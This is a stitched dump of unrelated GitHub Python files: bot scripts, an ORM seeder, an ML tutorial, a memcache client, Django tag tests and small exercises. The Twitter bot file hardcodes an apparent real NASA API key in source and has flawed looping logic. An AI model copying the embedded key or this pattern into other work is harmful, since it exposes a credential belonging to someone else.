bot.get_cog('Embeds')\n await bot.get_channel(734078899297714216).send(embed=await embeds.leave_log(member))\n\n\n# on_command_error event\n@bot.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.MissingAnyRole):\n return await ctx.send(f'Hey {ctx.author.mention} je hebt niet genoeg rechten hiervoor!')\n\n if isinstance(error, commands.MissingPermissions):\n return await ctx.send(f'Hey {ctx.author.mention} je hebt niet genoeg rechten hiervoor!')\n\n if isinstance(error, commands.CommandNotFound):\n return await ctx.send(f'Hey {ctx.author.mention} ik ken dat command niet!')\n\n if isinstance(error, commands.UserNotFound):\n return await ctx.send(f'Hey {ctx.author.mention} ik kan die gebruiker niet vinden...')\n\n if isinstance(error, commands.MissingRequiredArgument):\n return await ctx.send(\n f'{str(error).split(\" \")[0]} moet worden ingevuld! '\n f'Voorbeeld: `!{ctx.command.name} {str(error).split(\" \")[0]}`'\n )\n\n if isinstance(error, commands.CommandOnCooldown):\n time = str(timedelta(seconds=error.retry_after)).split(':')\n message = await ctx.send(\n f'Hey {ctx.author.mention} Je moet `{time[0]}`uur `{time[1]}`minuten en `{(time[2])[:2]}` seconden wachten!'\n )\n\n if error.retry_after < 5:\n loop_count = int(error.retry_after)\n else:\n loop_count = 5\n \n for i in range(1, loop_count):\n time = str(timedelta(seconds=error.retry_after - i)).split(':')\n await message.edit(\n content=f'Hey {ctx.author.mention} Je moet `{time[0]}`uur `{time[1]}`minuten en `{(time[2])[:2]}` seconden wachten!'\n )\n await asyncio.sleep(1)\n return await message.delete()\n\n# check .env\nif not os.path.exists(f'{bot_location}.env'):\n with open(f'{bot_location}.env', 'w') as file:\n file.write('token=BotToken\\nprefix=!\\ndatabase=data.db')\n print(f'{current_time()} - Created .env file')\nelif os.getenv('token') == 'BotToken':\n quit(f'{current_time()} - Please configure the .env file before starting')\n\n\n# print logo\nfor i in range(30):\n print('\\n')\n\nprint(\n \"\"\"\n _____ _ _ \n/ ___| | (_) \n\\ `--.| |__ _ _ __ \n `--. \\ '_ \\| | '_ \\ \n/\\__/ / | | | | | | |\n\\____/|_| |_|_|_| |_|\n \"\"\"\n)\n\n# start bot\nbot.run(token=os.getenv('token'), log_level=0)\n","repo_name":"meesvw/shin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"6154977322","text":"import os\nfrom platform import release\nfrom turtle import title\n\nos.remove('movies.db')\n\nfrom datetime import date\nfrom schema import db, Movie\n\ndb.connect()\ndb.create_tables([Movie])\n\nblade_runner = Movie.create(title=\"Blade Runner\",release_date = date(1982,6,25))\nblade_runner.rating = 10\n\nblade_runner.save()\n\nmovies = (\n ( \"Blade Runner 2049\" , 2018 , 9 ) ,\n ( \"2001 : a space odyssey \" , 1968 , 10 ) ,\n ( \"Godzilla vs. Hedorah \" , 1968 , 6 ) ,\n ( \"Silent Running \" , 1972 , 8 ) ,\n)\n\nfor movie in movies:\n\n Movie.create(title = movie[0],release_date=date(movie[1],1,1),rating=movie[2])","repo_name":"Muhthoriqas/Learn_ORM_Python","sub_path":"create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34398019059","text":"\"\"\"\nSimple Linear Regression utilizes this linear equation: y = b0 + b1*x1 - where y\nis the dependent variable (what we want to predict), and x1 is the independent\nvariable or feature, b0 is the y-intercept or a constant, and finally b1 is the\nslope coefficient. Regression is when you want to predict a real value.\n\nFor example, predicting the output of potatoes from the amount of fertilizer a\nfarmer chooses to use. The amount of fertilizer is the independent variable or \nthe feature (x1), while the dependent variable is the output of potatoes (y).\nThis would make the equation look like: Potatoes = b0 + b1*Fertilizer for our\nlinear regression model.\n\nOrdinary Least Squares is a technique used to find the best regression line\nthrough simple linear regression models. It works by finding the vertical \ndistance from every data point(yi) to the regression line (ŷi). The difference\nbetween these two (vertical distance between them) is called the residual: \nε1 = yi - ŷi this can be used to find the best regression line. Using the linear\nequation, we want to manipulate b0 and b1 in a way that the the SUM of the \nsquare of the residuals is as small as possible or SUM(yi - ŷi)^2 is smallest.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n\"\"\"\nImporting and reading the dataset with the help of pandas library\n\"\"\"\ndataset = pd.read_csv('Simple-Linear-Regression/Salary_Data.csv')\nX = dataset.iloc[:, :-1].values # Assigning the variable X as the values of all the rows from all the columns except for the last one\nY = dataset.iloc[:, -1].values # Y variable is the dependent variable and it takes values of all rows from the last column\n\n# print(X)\n# print(Y)\n\n\n\"\"\"\nSplitting the dataset into the training set and the test set\n\"\"\"\nfrom sklearn.model_selection import train_test_split # Import the model selection module from sklearn library and use the train_test_split function to split the model into training and testing sets\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 0) # Establish the variables for the four different sets. Specifying the size of the test size to be 20% while the seed is at 0\n\n\n# print(X_test)\n# print(X_train)\n# print(Y_test)\n# print(Y_train)\n\n\n\"\"\"\nBuilding a simple linear regression model requires importing the correct class.\nSimple linear regression models can be built by scratch or with libraries, in \nthis case we will be using the scikit-learn library to build our model.\n\"\"\"\nfrom sklearn.linear_model import LinearRegression # Use the scikit-learn library to call the LinearRegression class from the linear model module\n\nregressor = LinearRegression() # Assigning variable regressor as an instance object\nregressor.fit(X_train, Y_train) # The fit() method will train the regression model and make calculations based on our training sets for the features (X_train) and our dependent variable (Y_train)\n\n\n\"\"\"\nPredicting the test set results by producing the observations from the test set.\nThe model should be able to accurately predict the salary of the test sets, that\nwe have set aside (there should be 6 of them), based on the years of experience.\nThe ground truth is the actual value of the salaries from our testing sets.\n\"\"\"\nY_pred = regressor.predict(X_test) # Using the predict() method from the LinearRegression class, we can enter the testing set of our features as an argument to create an array of predictions. We will assign this new array to variable Y_pred \n\n\n\"\"\"\nVisualizing the training set results with matplotlib with the pyplot module by \ncreating a 2D plot with x-axis as the years of experience, and the y-axis being \nthe salaries. We are creating this graph for the features training set or X_train.\n\"\"\"\nplt.scatter(X_train, Y_train, color = 'red') # Use the pyplot module, being shown as plt, and use the scatter() module to create a scatter plot. The x-axis is X_train and the y-axis is Y_train. We are also setting the color of the line to be red.\nplt.plot(X_train, regressor.predict(X_train), color = 'blue') # Use the plot method to plot the years of experience from our training set, and then uset the predict method to find the predicted salaries for the training set.\n\nplt.title('Salary vs. Experience - Training Set') # Adding the title for the graph\nplt.xlabel('Years of Experience') # Labeling the x-axis\nplt.ylabel('Salary') # Labeling the y-axis\n\n# plt.show() # Displaying the graph\n\n\n\"\"\"\nVisualizing the test set results with matplotlib, similar to what we did earlier.\nWe will use the same labels, and axis except now we will use the X_test and \nY_test as our coordinates. However, the line will remain the same as the one\nfrom the training set, so we won't change anything in plot.\n\"\"\"\nplt.scatter(X_test, Y_test, color = 'red') # The cooridnates of the test sets have to be used\nplt.plot(X_train, regressor.predict(X_train), color = 'blue') # We want the same line as our training sets so we will continue to use the same variables to make the same line.\n\nplt.title('Salary vs. Experience - Test Set')\nplt.xlabel('Years of Experience')\nplt.ylabel('Salary')\n\n# plt.show()\n\n\n\"\"\"\nMaking a single prediction with the linear regression model that we have created.\nWe can accomplish this by using the predict() method as shown earlier and passing\na value for our x-axis or feature. In our case, the feature is years of \nexperience and so we can input the value 15 (must be inside a 2D array like this\n[[15]] because the predict() method only accepts 2D arrays).\n\"\"\"\nprint(regressor.predict([[15]])) # Instead of giving an entire array to predict the values of, we are just giving one value on the x-axis and the predict() method will find the y-value on the line, or the salary (dependent variable).\n\n\n\"\"\"\nFinding the final linear regression equation is possible by directly getting the\nvalues of the coefficients. We can get the values of the y-intercept (b0) and the\nslope (b1) with the .intercept_ and the .coef_ method.\n\"\"\"\ncoefficient = regressor.coef_ # Gets the coefficient (m) or the slope in the equation: y = mx + b \nintercept = regressor.intercept_ # Gets the y-intercept (b)\n\nprint(f'The equation of the line is: y = {coefficient}x + {intercept}') # Formatted string that displays the final regression line in one final equation!","repo_name":"redayzarra/machine-learning","sub_path":"Simple-Linear-Regression/SL_Regression.py","file_name":"SL_Regression.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23877679166","text":"import asyncio\nimport aiomcache\nimport binascii\nimport functools\nfrom typing import List, Tuple\n\n\ndef server_hash_func(key):\n return (((binascii.crc32(key) & 0xffffffff) >> 16) & 0x7fff) or 1\n\n\ndef pick_and_retry(func):\n @functools.wraps(func)\n async def wrapper(self, key, *args, **kwargs):\n retry = 0\n while True:\n backend, key = self._get_backend(key, retry)\n try:\n data = await func(self, backend, key, *args, **kwargs)\n return data\n except:\n retry += 1\n if retry > Client.MAX_RETRIES:\n raise\n return wrapper\n\n\nclass Client:\n\n MAX_RETRIES = 10\n\n def __init__(self, backends: List[Tuple], *, pool_size=2, pool_minsize=None, loop=None):\n self.loop = loop if loop else asyncio.get_event_loop()\n self.backends = []\n for host, port in backends:\n backend = aiomcache.Client(host, port, pool_size=pool_size, pool_minsize=pool_minsize, loop=loop)\n self.backends.append(backend)\n\n def _get_backend(self, key: str, retry: int = 0):\n if not self.backends:\n return None, None\n\n if isinstance(key, tuple):\n serverhash, key = key\n else:\n serverhash = server_hash_func(key.encode('utf-8'))\n\n if retry:\n serverhash = str(serverhash) + str(retry)\n serverhash = server_hash_func(serverhash.encode('utf-8'))\n\n server = self.backends[serverhash % len(self.backends)]\n return server, key\n\n async def close(self):\n tasks = [backend.close() for backend in self.backends]\n await asyncio.gather(*tasks)\n\n @pick_and_retry\n async def get(self, backend, key: str, default=None):\n return await backend.get(key.encode(), default=default)\n\n @pick_and_retry\n async def set(self, backend, key: str, value: bytes, exptime=0):\n return await backend.set(key.encode(), value, exptime=exptime)\n\n async def multi_get(self, keys: List[str]) -> List[bytes]:\n tasks = [self.get(key) for key in keys]\n return await asyncio.gather(*tasks)\n\n async def delete(self, key):\n tasks = [backend.delete(key.encode()) for backend in self.backends]\n await asyncio.gather(*tasks)\n\n\n__all__ = [Client, server_hash_func]\n","repo_name":"viert/aiomcache-multi","sub_path":"aiomcache_multi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70344788385","text":"\"\"\" CONSTANTS AND PARAMETERS FOR QC SCRIPTS: \"\"\"\r\n# output limits:\r\n#min_output=0\r\n#max_output=8.335\r\n# program parameters:\r\nglobal i\r\ni = 0\r\nxe = []\r\nye = []\r\nze = []\r\nxs = []\r\nys = []\r\nzs = []\r\nx_qc = []\r\ny_qc = []\r\nz_qc = []\r\nu = []\r\nv1 = []\r\nv2 = []\r\nv3 = []\r\nv4 = []\r\n#global variables:\r\ncumul=0\r\nlast_e=0\r\npAlphaE=0\r\npBetaE=0\r\npsp2=0\r\npsp1=0\r\nprevEuler=0\r\n\r\ncumulAlpha = 0\r\ncumulBeta = 0\r\n\r\ncumulAlphaPos = 0\r\ncumulBetaPos = 0\r\n\r\ns_r = 0\r\n\r\nparticlesTargetVelocities=[0,0,0,0]\r\n#speed weight:\r\nvParam=-2\r\n#parameters for vertical control\r\nKpv=2\r\nKiv=0\r\nKdv=2\r\n#parameters for horizontal control:\r\nKph=0.4\r\nKih=0.1\r\nKdh=1.5\r\nKph_pos1=0.4\r\nKih_pos1=0.001\r\nKdh_pos1=0.05\r\nKph_pos0=0.4\r\nKih_pos0=0.001\r\nKdh_pos0=0.05\r\n#parameters for rotational control:\r\nKpr=0.05\r\nKir=0\r\nKdr=0.9\r\n\"\"\" =========================================================== \"\"\"\r\n# parameters needed for gradient descent:\r\nt0 = 0\r\ntf = 1\r\ndt = 0.01\r\n\r\nsum_h_alpha = []\r\nsum_h_beta = []\r\nsum_h_pos0 = []\r\nsum_h_pos1 = []\r\n\r\nlast_alpha_angle = 0\r\nlast_alpha_pos = 0\r\nlast_beta_angle = 0\r\nlast_beta_pos = 0\r\n \r\ndelta_alpha_angle = []\r\ndelta_alpha_pos = []\r\ndelta_beta_angle = []\r\ndelta_beta_pos = []\r\n\r\nJ_h_alpha = []\r\nJ_h_beta = []\r\nJ_h_pos0 = []\r\nJ_h_pos1 = []\r\n\r\nparamX = []\r\nparamY = []\r\n\r\ntheta_h_angles = [Kph, Kih, Kdh]\r\ntheta_h_pos = [Kph_pos0, Kih_pos0, Kdh_pos0] # Kph_pos0 == Kph_pos1 ...\r\n\r\ngd = 0","repo_name":"Gochev-Ivan/MAS","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"8124958621","text":"#!usr/bin/python\r\n\r\n\r\nimport os\r\nimport urllib.request\r\nimport time\r\nimport requests\r\nfrom config import getApi\r\n\r\n\r\napi = getApi()\r\nnasaAPI = 'Rn8kSqjsLbjwTQsvb2DFstOBjht4PRkesybxBSKh'\r\n\r\ndef tweetRoverPhotos():\r\n \"\"\"This function makes a request to the NASA API\r\n by changing parameters in the URL. It uses a conditional that\r\n loops through every photo taken on that Sol and post a tweet with the photo included.\"\"\"\r\n\r\n marsSol = 1000 #A Sol is a measurement for a day on Mars\r\n req = requests.get(f'https://api.nasa.gov/mars-photos/api/v1/rovers/curiosity/photos?sol={str(marsSol)}&camera=mast&api_key={nasaAPI}')\r\n dictionary = req.json()\r\n index = 0\r\n\r\n if index == len(dictionary['photos']) - 1:\r\n marsSol+=1\r\n print(\"Mars Sol= \" + str(marsSol))\r\n\r\n else:\r\n for photo in dictionary['photos']:\r\n imageURL = dictionary['photos'][index]['img_src']\r\n urllib.request.urlretrieve(imageURL, 'curiosity.jpg')\r\n status = f\"MARTIAN DIRT ALERT: Check out this cool photo from the Curiosity Rover taken using the MAST Camera.\"\r\n api.PostUpdate(status, media=\"curiosity.jpg\")\r\n os.remove(\"curiosity.jpg\")\r\n time.sleep(900) #Post every 15 minutes\r\n index +=1\r\n\r\nwhile True:\r\n tweetRoverPhotos()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BriaWilliams/twitterBot","sub_path":"twiterBot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24753330716","text":"from collections import deque\n\n\nstack_of_chocolates = [int(x) if x else 0 for x in input().split(', ')]\nqueue_of_milk = deque(int(x) if x else 0 for x in input().split(', '))\nmilkshakes = 0\n\nwhile stack_of_chocolates and queue_of_milk and milkshakes < 5:\n chocolate = stack_of_chocolates.pop()\n cup_of_milk = queue_of_milk.popleft()\n\n if chocolate <= 0 and cup_of_milk <= 0:\n continue\n\n if chocolate <= 0:\n queue_of_milk.appendleft(cup_of_milk)\n continue\n\n if cup_of_milk <= 0:\n stack_of_chocolates.append(chocolate)\n continue\n\n if chocolate == cup_of_milk:\n milkshakes += 1\n else:\n stack_of_chocolates.append(chocolate - 5)\n queue_of_milk.append(cup_of_milk)\n\nif milkshakes == 5:\n print(\"Great! You made all the chocolate milkshakes needed!\")\nelse:\n print(\"Not enough milkshakes.\")\n\nprint(f\"Chocolate: {', '.join(str(x) for x in stack_of_chocolates) if stack_of_chocolates else 'empty'}\")\nprint(f\"Milk: {', '.join(str(x) for x in queue_of_milk) if queue_of_milk else 'empty'}\")\n","repo_name":"kostakazakoff/SoftUni","sub_path":"Python Advanced/stacks_queues_tuples_and_sets/milkshakes.py","file_name":"milkshakes.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"12984510866","text":"\"\"\"Helper function to normalise and denormalise.\"\"\"\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport src.topicmodel as tm\n\n\ndef encoders(raw_data):\n # Encoding the labels\n le_txt = preprocessing.LabelEncoder()\n\n # Normalising inputs and outputs\n in_scaler = MinMaxScaler(feature_range=(0, 1))\n out_scaler = MinMaxScaler(feature_range=(0, 1))\n\n return in_scaler, out_scaler, le_txt\n\n\ndef preprocess_training(raw_data, le_txt, in_scaler, out_scaler):\n # Separate inputs from outputs in training dataset\n #raw_data['text'] = le_txt.fit_transform(raw_data['text'])\n \n text_topics = tm.topic_matcher(raw_data['text'])\n raw_data['t0'] = text_topics['t0']\n raw_data['t1'] = text_topics['t1']\n raw_data['t2'] = text_topics['t2']\n raw_data['t3'] = text_topics['t3']\n raw_data['t4'] = text_topics['t4']\n\n inputs = raw_data.drop(['ctd'], axis=1).values\n outputs = raw_data[['ctd']].values\n\n # Scale both the training inputs and outputs\n in_scaled = in_scaler.fit_transform(inputs)\n out_scaled = out_scaler.fit_transform(outputs)\n\n return in_scaled, out_scaled\n\n\ndef preprocess_predict(raw_data, le_txt, in_scaler):\n # Separate inputs from outputs in training dataset\n #raw_data['text'] = le_txt.fit_transform(raw_data['text'])\n\n text_topics = tm.topic_matcher(raw_data['text'])\n raw_data['t0'] = text_topics['t0']\n raw_data['t1'] = text_topics['t1']\n raw_data['t2'] = text_topics['t2']\n raw_data['t3'] = text_topics['t3']\n raw_data['t4'] = text_topics['t4']\n\n inputs = raw_data.values\n\n # Scale both the training inputs and outputs\n in_scaled = in_scaler.fit_transform(inputs)\n\n return in_scaled\n\n\ndef training_test(in_scaled, out_scaled, out_scaler, size):\n in_training, in_test, out_training, out_test = train_test_split(\n in_scaled, out_scaled, test_size=size)\n return in_training, in_test, out_training, out_test\n","repo_name":"HarryGrayDV/OptimusSite","sub_path":"data-science/src/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40958622399","text":"import pandas as pd\n\ndef get_assets():\n ''' Convert the data types of the assets dataset'''\n assets = pd.read_csv('./app/models/cleaned-datasets/cleaned_assets.csv')\n # convert timestamps/datetime\n timestamps = ['last_sale_transaction_timestamp', 'last_sale_event_timestamp', 'last_sale_created_date', 'asset_contract_created_date']\n for timestamp in timestamps:\n assets[timestamp] = pd.to_datetime(assets[timestamp], format = '%Y-%m-%dT%H:%M:%S')\n # Convert categorical string\n assets['asset_category'] = assets['asset_category'].astype('category')\n # Convert numerical strings into numerical datatypes\n assets['last_sale_total_price'] = assets['last_sale_total_price'].astype('float64')\n assets['asset_favorites'] = assets['asset_favorites'].astype('int64')\n # Adding year created in assets dataframe\n assets['created_year'] = assets['asset_contract_created_date'].dt.year\n # Drop Unnecessary column\n assets.drop('token_id', axis = 'columns', inplace = True)\n # Rename columns \n assets.columns = assets.columns.str.replace(\"_\", \" \")\n assets.columns = assets.columns.str.title()\n return assets\n\ndef get_events():\n '''Convert the data types of the events dataset'''\n events = pd.read_csv('./app/models/cleaned-datasets/cleaned_events.csv')\n # Listing all necessary changes\n timestamps = ['listing_time', 'created_date']\n categories = ['event_type', 'auction_type']\n numerics = ['total_price', 'ending_price', 'starting_price']\n # Convert datetime\n for timestamp in timestamps:\n events[timestamp] = pd.to_datetime(events[timestamp], format = '%Y-%m-%dT%H:%M:%S')\n # Convert categorical data\n events[categories] = events[categories].astype('category')\n # Convert numerical strings\n events[numerics] = events[numerics].astype('float64')\n events.columns = events.columns.str.replace(\"_\", \" \")\n events.columns = events.columns.str.title()\n return events\n\ndef get_collections():\n collections = pd.read_csv(\"./app/models/cleaned-datasets/cleaned_collections.csv\")\n collections['created_date'] = pd.to_datetime(collections['created_date'], format = '%Y-%m-%dT%H:%M:%S')\n collections.columns = collections.columns.str.replace(\"_\", \" \")\n collections.columns = collections.columns.str.title()\n return collections\n\ndef get_listings():\n return pd.read_csv('./app/models/cleaned-datasets/best_listing.csv')","repo_name":"kevinbennetth/GRMDS-NFT-Competition","sub_path":"app/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72873756704","text":"from django.http import Http404\nfrom django.test import TestCase\n\nfrom source.code.models import Code\nfrom source.tags.models import TechnologyTag, ConceptTag\nfrom source.tags.utils import (get_validated_tag_list,\n get_tag_filtered_queryset, filter_queryset_by_tags)\n\n\nclass BaseTestCase(TestCase):\n def assertQuerysetEqual(self, qs1, qs2):\n pk = lambda o: o.pk\n return self.assertEqual(\n list(sorted(qs1, key=pk)),\n list(sorted(qs2, key=pk))\n )\n \nclass TestCodeTagAdd(BaseTestCase):\n code_model = Code\n tech_tag_model = TechnologyTag\n concept_tag_model = ConceptTag\n \n def setUp(self):\n self.tech_tag = self.tech_tag_model.objects.create(name=\"javascript\", slug=\"javascript\")\n self.concept_tag = self.concept_tag_model.objects.create(name=\"mapping\", slug=\"mapping\")\n self.code_one = self.code_model.objects.create(name=\"supermaps\", slug=\"supermaps\")\n self.code_two = self.code_model.objects.create(name=\"justmaps\", slug=\"justmaps\")\n self.code_three = self.code_model.objects.create(name=\"justjs\", slug=\"justjs\")\n \n def test_code_entries(self):\n self.assertEqual(self.code_one.title, \"supermaps\")\n self.assertEqual(self.code_two.title, \"justmaps\")\n self.assertEqual(self.code_three.title, \"justjs\")\n \n def test_add_tags(self):\n # make sure code_one has two empty tagfields\n self.assertEqual(list(self.code_one.technology_tags.all()), [])\n self.assertEqual(list(self.code_one.concept_tags.all()), [])\n # add one tag of each kind\n self.code_one.technology_tags.add(\"javascript\")\n self.code_one.concept_tags.add(\"mapping\")\n # make sure code_one has the right tags in each tagfield\n self.assertEqual(list(self.code_one.technology_tags.all()), [self.tech_tag])\n self.assertEqual(list(self.code_one.concept_tags.all()), [self.concept_tag])\n\n # make sure code_two has two empty tagfields\n self.assertEqual(list(self.code_two.technology_tags.all()), [])\n self.assertEqual(list(self.code_two.concept_tags.all()), [])\n # add just one concept tag\n self.code_two.concept_tags.add(\"mapping\")\n # make sure code_two has the right tags in each tagfield\n self.assertEqual(list(self.code_two.technology_tags.all()), [])\n self.assertEqual(list(self.code_two.concept_tags.all()), [self.concept_tag])\n\n # make sure code_three has two empty tagfields\n self.assertEqual(list(self.code_three.technology_tags.all()), [])\n self.assertEqual(list(self.code_three.concept_tags.all()), [])\n # add just one technology tag\n self.code_three.technology_tags.add(\"javascript\")\n # make sure code_three has the right tags in each tagfield\n self.assertEqual(list(self.code_three.technology_tags.all()), [self.tech_tag])\n self.assertEqual(list(self.code_three.concept_tags.all()), [])\n\nclass TestCodeTagQueries(BaseTestCase):\n code_model = Code\n tech_tag_model = TechnologyTag\n concept_tag_model = ConceptTag\n\n def setUp(self):\n self.tech_tag = self.tech_tag_model.objects.create(name=\"javascript\", slug=\"javascript\")\n self.concept_tag = self.concept_tag_model.objects.create(name=\"mapping\", slug=\"mapping\")\n # first code entry gets one tag of each kind\n self.code_one = self.code_model.objects.create(name=\"supermaps\", slug=\"supermaps\")\n self.code_one.technology_tags.add(\"javascript\")\n self.code_one.concept_tags.add(\"mapping\")\n # second code entry gets just one concept tag\n self.code_two = self.code_model.objects.create(name=\"justmaps\", slug=\"justmaps\")\n self.code_two.concept_tags.add(\"mapping\")\n # third code entry gets just one tech tag\n self.code_three = self.code_model.objects.create(name=\"justjs\", slug=\"justjs\")\n self.code_three.technology_tags.add(\"javascript\")\n # this is not ideal, but because of django-taggit internals,\n # we can't filter querysets based on tags unless we compile all\n # technology_tags and concept_tags into a common `tags` list too\n self.code_one.tags.add(\"javascript\",\"mapping\")\n self.code_two.tags.add(\"mapping\")\n self.code_three.tags.add(\"javascript\")\n \n \n def test_tags_added_properly(self):\n self.assertEqual(list(self.code_one.technology_tags.all()), [self.tech_tag])\n self.assertEqual(list(self.code_one.concept_tags.all()), [self.concept_tag])\n self.assertEqual(list(self.code_two.concept_tags.all()), [self.concept_tag])\n self.assertEqual(list(self.code_three.technology_tags.all()), [self.tech_tag])\n\n def test_get_validated_tag_list(self):\n tag_slug_list_one = [\"javascript\", \"mapping\"]\n tags_one = get_validated_tag_list(tag_slug_list_one)\n self.assertEqual(tags_one, [self.tech_tag, self.concept_tag])\n \n tag_slug_list_two = [\"javascript\", \"mapping\", \"this_tag_does_not_exist\"]\n self.assertRaises(Http404, lambda: get_validated_tag_list(tag_slug_list_two))\n \n def test_get_tag_filtered_queryset(self):\n code_objects = self.code_model.objects.all()\n\n tag_slug_list_one = [\"javascript\", \"mapping\"]\n queryset_one = get_tag_filtered_queryset(code_objects, tag_slug_list_one)\n self.assertQuerysetEqual(queryset_one, [self.code_one])\n\n tag_slug_list_two = [\"mapping\"]\n queryset_two = get_tag_filtered_queryset(code_objects, tag_slug_list_two)\n self.assertQuerysetEqual(queryset_two, [self.code_one, self.code_two])\n\n tag_slug_list_three = [\"javascript\"]\n queryset_three = get_tag_filtered_queryset(code_objects, tag_slug_list_three)\n self.assertQuerysetEqual(queryset_three, [self.code_one, self.code_three])\n \n def test_filter_queryset_by_tags(self):\n code_objects = self.code_model.objects.all()\n\n tag_slugs_one = \"javascript+mapping\"\n queryset_one, tags_one = filter_queryset_by_tags(code_objects, tag_slugs_one, tags=[])\n self.assertQuerysetEqual(queryset_one, [self.code_one])\n self.assertEqual(tags_one, [self.tech_tag, self.concept_tag])\n \n tag_slugs_two = \"mapping\"\n queryset_two, tags_two = filter_queryset_by_tags(code_objects, tag_slugs_two, tags=[])\n self.assertQuerysetEqual(queryset_two, [self.code_one, self.code_two])\n self.assertEqual(tags_two, [self.concept_tag])\n \n tag_slugs_three = \"javascript\"\n queryset_three, tags_three = filter_queryset_by_tags(code_objects, tag_slugs_three, tags=[])\n self.assertQuerysetEqual(queryset_three, [self.code_one, self.code_three])\n self.assertEqual(tags_three, [self.tech_tag])\n\n tag_slugs_four = \"javascript+this_tag_does_not_exist\"\n self.assertRaises(Http404, lambda: filter_queryset_by_tags(\n code_objects, tag_slugs_four, tags=[])\n )\n ","repo_name":"OpenNews/opennews-source","sub_path":"source/tags/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"22995488345","text":"\"\"\"\r\nMột xâu ký tự được gọi là “thăng bằng” nếu khoảng cách của tất cả các cặp ký tự cạnh nhau trong xâu đó đều đúng bằng khoảng cách của hai vị trí tương ứng trong xâu đảo của nó.\r\nVí dụ xâu s1 có độ dài N và xâu đảo của nó là s2 thì xâu này sẽ thỏa mãn tính chất thăng bằng nếu:\r\n|s1[i] – s1[i-1]| = |s2[i] – s2[i-1]| với tất cả giá trị 0 < i < N\r\nHãy kiểm tra xem một xâu ký tự bất kỳ có phải là xâu “thăng bằng” hay không.\r\nInput:\r\n2\r\nacxz\r\nbcxz\r\nOutput:\r\nYES\r\nNO\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n t = int(input())\r\n for _ in range(t):\r\n s = input()\r\n t = ''.join(reversed(s))\r\n # t = s[::-1]\r\n ok = 0\r\n for i in range(1, len(s)):\r\n if abs(ord(s[i]) - ord(s[i - 1])) != abs(ord(t[i]) - ord(t[i - 1])):\r\n print(\"NO\")\r\n ok = 1\r\n break\r\n if ok == 0: print(\"YES\")","repo_name":"vantuan0128/PYTHON_PTIT","sub_path":"PY01066.py","file_name":"PY01066.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"7540935410","text":"import os\nimport sys\nimport click\nfrom tinydb import TinyDB\n\n\nCONTEXT_SETTINGS = dict(auto_envvar_prefix='SLOGGER')\n\n\nclass Context(object):\n\n def __init__(self):\n self.verbose = False\n self.home = os.getcwd()\n\n def log(self, msg, *args):\n \"\"\"Logs a message to stderr.\"\"\"\n if args:\n msg %= args\n click.echo(msg, file=sys.stderr)\n\n def warning(self, msg, *args):\n \"\"\"Logs a warning to stderr.\"\"\"\n self.log(click.style(\"## WARNING - %s\" % msg, *args, fg='yellow'))\n\n def error(self, msg, *args):\n \"\"\"Logs an error to stderr.\"\"\"\n self.log(click.style(\"## ERROR - %s\" % msg, *args, fg='red'))\n\n def info(self, msg, *args):\n \"\"\"Logs an info message to stderr.\"\"\"\n self.log(click.style(\"## INFO - %s\" % msg, *args, fg='blue'))\n\n def debug(self, msg, *args):\n \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\"\n if self.verbose:\n self.log(click.style(\"DEBUG - %s\" % msg, *args, fg='green'))\n\n\npass_context = click.make_pass_decorator(Context, ensure=True)\ndb = TinyDB(os.path.expanduser('~/.slogger.json'))\ncmd_folder = os.path.abspath(os.path.join(os.path.dirname(__file__),\n 'commands'))\n\n\nclass ComplexCLI(click.MultiCommand):\n\n def list_commands(self, ctx):\n rv = []\n for filename in os.listdir(cmd_folder):\n if filename.endswith('.py') and \\\n filename.startswith('cmd_'):\n rv.append(filename[4:-3])\n rv.sort()\n return rv\n\n def get_command(self, ctx, name):\n try:\n if sys.version_info[0] == 2:\n name = name.encode('ascii', 'replace')\n mod = __import__('slogger.commands.cmd_' + name,\n None, None, ['cli'])\n except ImportError:\n return\n return mod.cli\n\n\n@click.command(cls=ComplexCLI, context_settings=CONTEXT_SETTINGS)\n@click.option('-v', '--verbose', is_flag=True,\n help='Enables verbose mode.')\n@pass_context\ndef cli(ctx, verbose):\n \"\"\"Logging interface to add messages to a file based on project\"\"\"\n ctx.verbose = verbose\n\nif __name__ == \"__main__\":\n 